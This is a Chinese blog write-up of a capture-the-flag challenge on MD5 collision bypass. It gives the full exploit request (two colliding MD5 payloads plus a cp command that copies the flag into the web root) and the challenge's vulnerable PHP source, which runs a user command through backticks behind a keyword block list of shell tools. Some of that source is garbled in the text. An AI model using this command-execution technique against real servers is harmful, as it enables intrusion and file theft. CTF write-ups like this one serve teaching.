MD5 弱类型

前言

学长出了道套娃题,花了点时间,没给源码就黑盒硬做。其实给了md5提示的,但没想到。

知识点

这道题难点主要是没给源代码,考点主要是:

* MD5 弱类型
* 代码审计

实践

  1. exp

    POST /index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=cp%20/flag%20/var/www/html/flag HTTP/1.1
    Host: 127.0.0.1:20031
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Length: 307
    Content-Type: application/x-www-form-urlencoded
    
    a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
    

    注意手动改包时需要加上 Content-Type: application/x-www-form-urlencoded
    这样才能发POST数据

  2. 然后访问网站根目录下flag即可

  3. 当时拿到题就开始分析URL,img是一个将文件名hex转换后base64加密2次的结果,当时尝试直接修改内容为/flag取出内容,无果。尝试了各种方法,都不行,最后做出来时发现源码过滤写死了,先是把解码后的内容进行preg_replace,只保留了a-z,A-Z,1-9,. 这些内容。

  4. 然后对第二个cmd进行测试,通过提示发现可能是考的md5弱类型,试了下,发现过滤了大部分使用函数,发现cp未过滤,通过将flag拷贝至网站根目录拿到flag。

  5. 拿到源码果不其然,img是写死了。

  6. 就硬套

    <?php
    error_reporting(E_ALL || ~ E_NOTICE);
    header('content-type:text/html;charset=utf-8');
    $cmd = $_GET['cmd'];
    if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
        header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
    $file = hex2bin(base64_decode(base64_decode($_GET['img'])));
    
    $file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
    if (preg_match("/flag/i", $file)) {
        echo '<img src ="./ctf3.jpeg">';
        die("xixi锝� no flag");
    } else {
        $txt = base64_encode(file_get_contents($file));
        echo "<img src='data:image/gif;base64," . $txt . "'></img>";
        echo "<br>";
    }
    echo $cmd;
    echo "<br>";
    if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
        echo("forbid ~");
        echo "<br>";
    } else {
        if ((string)``_POST['a'] !== (string)``_POST['b'] && md5(``_POST['a']) === md5(``_POST['b'])) {
            echo `$cmd`;
        } else {
            echo ("md5 is funny ~");
        }
    }
    
    ?>
    <html>
    <style>
      body{
       background:url(./bj.png)  no-repeat center center;
       background-size:cover;
       background-attachment:fixed;
       background-color:#CCCCCC;
    }
    </style>
    <body>
    </body>
    </html>
    

本文链接:

https://yuno0n.top/index.php/archives/49/
1 + 6 =
快来做第一个评论的人吧~